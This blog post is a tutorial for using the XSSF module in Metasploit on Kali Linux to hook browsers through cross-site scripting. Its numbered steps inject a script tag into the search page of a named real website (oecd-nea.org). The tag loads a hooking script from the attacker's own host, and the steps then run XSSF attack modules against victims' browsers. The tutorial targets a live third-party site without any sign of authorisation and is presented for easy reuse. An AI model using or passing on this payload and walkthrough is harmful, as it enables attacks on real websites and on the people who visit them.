mardi 25 mars 2014

XSSF .


XSSF on Kali Linux
description

The Cross-Site Scripting Framework (XSSF) is a security tool designed to turn the XSS vulnerability exploitation task into a much easier work. The XSSF project aims to demonstrate the real dangers of XSS vulnerabilities, vulgarizing their exploitation. This project is created solely for education, penetration testing! 


XSSF allows creating a communication channel with the targeted browser (from a XSS vulnerability) in order to perform further attacks. Users are free to select existing modules (a module = an attack) in order to target specific browsers. 

Let's get started !!

You will of needed to installed XSSF before this! NOTE: use Lazy Kali for quick install 1)first you want to open metasploit! (type msfconsole)2)Then to open xssf type: load xssf port=666



   

                                                                             



3)Then you want to open test page type xssf_urls then open link in new tab 
4)once you have the injector you want to find an xssf vuln page!
5) you put the link into search bar then paste the injector
6) LINK: http://www.oecd-nea.org/globalsearch/search.php?q=%3Cscript%20type=%22text/
7) once you have done this you should have something that looks like:
http://www.oecd-nea.org/globalsearch/search.php?q=<script type="text/javascript" src="http://192.168.2.74:8888/loop?interval=5"></script>

8)once you have opened this go back to metasploit and type xssf_victims

9) Then type search xssf there is a list of auxiloary! ill show you how to use alert!

10)you want to use: use auxiliary/xssf/public/misc/alert and then type show options
11) then you have to set Alert Message! type set AlertMessage "Hello Wolrd"
12)then once you have done this type run FOLLOW MY STEPS Tutorial By Gravity Please like our FaceBook page for more easy tutorials
                                              https://www.facebook.com/major.geek1

The Cross-Site Scripting Framework (XSSF) is a security tool designed to turn the XSS vulnerability exploitation task into a much easier work. The XSSF project aims to demonstrate the real dangers of XSS vulnerabilities, vulgarizing their exploitation. This project is created solely for education, penetration testing! 
XSSF allows creating a communication channel with the targeted browser (from a XSS vulnerability) in order to perform further attacks. Users are free to select existing modules (a module = an attack) in order to target specific browsers. 


Tags:

0 Responses to “XSSF .”

Enregistrer un commentaire

Subscribe

Donec sed odio dui. Duis mollis, est non commodo luctus, nisi erat porttitor ligula, eget lacinia odio. Duis mollis

© 2013 Linux Pentest. All rights reserved.
Designed by SpicyTricks